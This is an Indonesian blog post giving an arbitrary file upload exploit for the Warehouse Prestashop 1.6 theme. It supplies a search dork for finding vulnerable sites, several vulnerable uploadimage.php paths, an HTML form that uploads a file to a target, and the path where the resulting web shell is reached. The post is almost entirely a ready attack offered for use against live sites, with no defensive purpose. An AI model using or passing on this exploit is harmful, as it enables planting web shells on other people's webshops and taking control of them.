Rabu, 22 Juni 2016

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload

Exploit Author :
people_hurt

Dork :
- inurl:/modules/columnadverts/
- Kembangin lagi ya :D

Jika Vuln akan seperti ini :
Exploit & poc :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"

Exploit :
<form method="POST" action="TARGET/modules/module name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
Respon : success:shell.xxx
Auto Exploit:
DISINI

Shell Access :
TARGET/modules/modul name/slides/shell.xxx

Tidak ada komentar:

Posting Komentar